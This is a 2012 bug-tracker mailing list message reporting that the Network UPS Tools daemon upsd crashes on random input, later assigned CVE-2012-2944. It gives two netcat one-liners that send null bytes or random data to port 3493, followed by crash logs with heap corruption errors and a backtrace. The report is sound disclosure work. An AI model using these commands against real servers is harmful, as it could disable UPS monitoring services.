[nut-Bugs][313636] upsd crashes if it receives random data
nut-bugs at alioth.debian.org
nut-bugs at alioth.debian.org
Tue May 29 21:43:55 UTC 2012
nut-Bugs item #313636, was changed at 29/05/2012 23:43 by Arnaud Quette
You can respond by visiting:
https://alioth.debian.org/tracker/?func=detail&atid=411542&aid=313636&group_id=30602
Status: Open
Priority: 3
Submitted By: Sebastian Pohle (sepo-guest)
Assigned to: Nobody (None)
Summary: upsd crashes if it receives random data
Category: Server
Group: None
Resolution: None
Initial Comment:
It is possible to remotely kill the upsd daemon if you send random data to the port it is listening on.
I 've tested it with Debian 6 (nut_2.4.3-1.1squeeze1) and Ubuntu 12.04 (nut-server_2.6.3-1ubuntu1).
Possible commands to reproduce this behavior are:
printf "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n" | netcat 127.0.0.1 3493
dd if=/dev/urandom count=10 | netcat 127.0.0.1 3493
The error message upsd prints on exit is kind of random. Possible error message i've seen are:
root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000211 setuptcp: try to bind to 127.0.0.1 port 3493
0.000353 listening on 127.0.0.1 port 3493
0.000726 Connected to UPS [dummy1]: dummy-ups-dummy1
0.001917 mainloop: polling 2 filedescriptors
0.194902 mainloop: polling 2 filedescriptors
0.195057 UPS [dummy1]: dump is done
0.195117 mainloop: polling 2 filedescriptors
0.781194 Connect from 127.0.0.1
0.781240 mainloop: polling 3 filedescriptors
0.781305 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781373 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781429 mainloop: polling 3 filedescriptors
0.781477 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781522 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781560 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781599 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781634 mainloop: polling 3 filedescriptors
0.781676 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781717 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781743 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781779 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781810 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781852 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781894 mainloop: polling 3 filedescriptors
Segmentation fault
root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000324 setuptcp: try to bind to 127.0.0.1 port 3493
0.000586 listening on 127.0.0.1 port 3493
0.001157 Connected to UPS [dummy1]: dummy-ups-dummy1
0.002920 mainloop: polling 2 filedescriptors
0.003184 mainloop: polling 2 filedescriptors
0.003345 UPS [dummy1]: dump is done
0.003471 mainloop: polling 2 filedescriptors
1.889695 Connect from 127.0.0.1
1.889836 mainloop: polling 3 filedescriptors
upsd: malloc.c:3575: mremap_chunk: Assertion `((size + offset) & (mp_.pagesize-1)) == 0' failed.
Aborted
root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000233 setuptcp: try to bind to 127.0.0.1 port 3493
0.000405 listening on 127.0.0.1 port 3493
0.000831 Connected to UPS [dummy1]: dummy-ups-dummy1
0.001926 mainloop: polling 2 filedescriptors
0.159276 mainloop: polling 2 filedescriptors
0.159502 UPS [dummy1]: dump is done
0.159626 mainloop: polling 2 filedescriptors
2.160695 mainloop: no data available
2.160832 mainloop: polling 2 filedescriptors
4.162958 mainloop: no data available
4.163092 mainloop: polling 2 filedescriptors
6.096929 Connect from 127.0.0.1
6.097012 Pinging UPS [dummy1]
6.097075 mainloop: polling 3 filedescriptors
upsd: malloc.c:3097: sYSMALLOc: Assertion `(old_top == (((mbinptr) (((char *) &((av)->bins[((1) - 1) * 2])) - __builtin_offsetof (struct malloc_chunk, fd)))) && old_size == 0) || ((unsigned long) (old_size) >= (unsigned long)((((__builtin_offsetof (struct malloc_chunk, fd_nextsize))+((2 * (sizeof(size_t))) - 1)) & ~((2 * (sizeof(size_t))) - 1))) && ((old_top)->size & 0x1) && ((unsigned long)old_end & pagemask) == 0)' failed.
Aborted
root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000218 setuptcp: try to bind to 127.0.0.1 port 3493
0.000447 listening on 127.0.0.1 port 3493
0.000906 Connected to UPS [dummy1]: dummy-ups-dummy1
0.002018 mainloop: polling 2 filedescriptors
0.002194 mainloop: polling 2 filedescriptors
0.002262 UPS [dummy1]: dump is done
0.002305 mainloop: polling 2 filedescriptors
1.384295 Connect from 127.0.0.1
1.384374 mainloop: polling 3 filedescriptors
1.384616 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
1.384698 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
1.384893 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
1.384980 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
1.385130 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
*** glibc detected *** upsd: realloc(): invalid next size: 0x09d46850 ***
======= Backtrace: =========
/lib/libc.so.6(+0x6b19a)[0xb768319a]
/lib/libc.so.6(+0x7093d)[0xb768893d]
/lib/libc.so.6(realloc+0xd7)[0xb7688c17]
/lib/libc.so.6(+0x5f8da)[0xb76778da]
/lib/libc.so.6(fclose+0xc9)[0xb76735b9]
/lib/libc.so.6(__vsyslog_chk+0x186)[0xb76dffe6]
/lib/libc.so.6(syslog+0x27)[0xb76e0457]
upsd[0x804edf4]
upsd[0x804f00f]
upsd[0x804a1d9]
upsd[0x804a436]
upsd[0x804ad08]
/lib/libc.so.6(__libc_start_main+0xe6)[0xb762ec96]
upsd[0x80496c1]
======= Memory map: ========
08048000-08053000 r-xp 00000000 08:01 140166 /sbin/upsd
08053000-08054000 rwxp 0000a000 08:01 140166 /sbin/upsd
09d3e000-09d5f000 rwxp 00000000 00:00 0 [heap]
b7400000-b7421000 rwxp 00000000 00:00 0
b7421000-b7500000 ---p 00000000 00:00 0
b758b000-b75a8000 r-xp 00000000 08:01 128283 /lib/libgcc_s.so.1
b75a8000-b75a9000 rwxp 0001c000 08:01 128283 /lib/libgcc_s.so.1
b75ad000-b75e2000 r-xs 00000000 08:06 2234 /var/cache/nscd/group
b75e2000-b7617000 r-xs 00000000 08:06 2233 /var/cache/nscd/passwd
b7617000-b7618000 rwxp 00000000 00:00 0
b7618000-b7756000 r-xp 00000000 08:01 140230 /lib/libc-2.11.3.so
b7756000-b7757000 ---p 0013e000 08:01 140230 /lib/libc-2.11.3.so
b7757000-b7759000 r-xp 0013e000 08:01 140230 /lib/libc-2.11.3.so
b7759000-b775a000 rwxp 00140000 08:01 140230 /lib/libc-2.11.3.so
b775a000-b775e000 rwxp 00000000 00:00 0
b775e000-b7765000 r-xp 00000000 08:01 129074 /lib/libwrap.so.0.7.6
b7765000-b7766000 rwxp 00007000 08:01 129074 /lib/libwrap.so.0.7.6
b7766000-b7779000 r-xp 00000000 08:01 129528 /lib/libnsl-2.11.3.so
b7779000-b777a000 r-xp 00012000 08:01 129528 /lib/libnsl-2.11.3.so
b777a000-b777b000 rwxp 00013000 08:01 129528 /lib/libnsl-2.11.3.so
b777b000-b777d000 rwxp 00000000 00:00 0
b7780000-b7783000 rwxp 00000000 00:00 0
b7783000-b779e000 r-xp 00000000 08:01 140223 /lib/ld-2.11.3.so
b779e000-b779f000 r-xp 0001b000 08:01 140223 /lib/ld-2.11.3.so
b779f000-b77a0000 rwxp 0001c000 08:01 140223 /lib/ld-2.11.3.so
bf9d8000-bf9f9000 rw-p 00000000 00:00 0 [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]
Aborted
----------------------------------------------------------------------
>Comment By: Arnaud Quette (aquette)
Date: 29/05/2012 23:43
Message:
This has been assigned CVE-2012-2944 by MITRE
----------------------------------------------------------------------
You can respond by visiting:
https://alioth.debian.org/tracker/?func=detail&atid=411542&aid=313636&group_id=30602
More information about the NUT-tracker
mailing list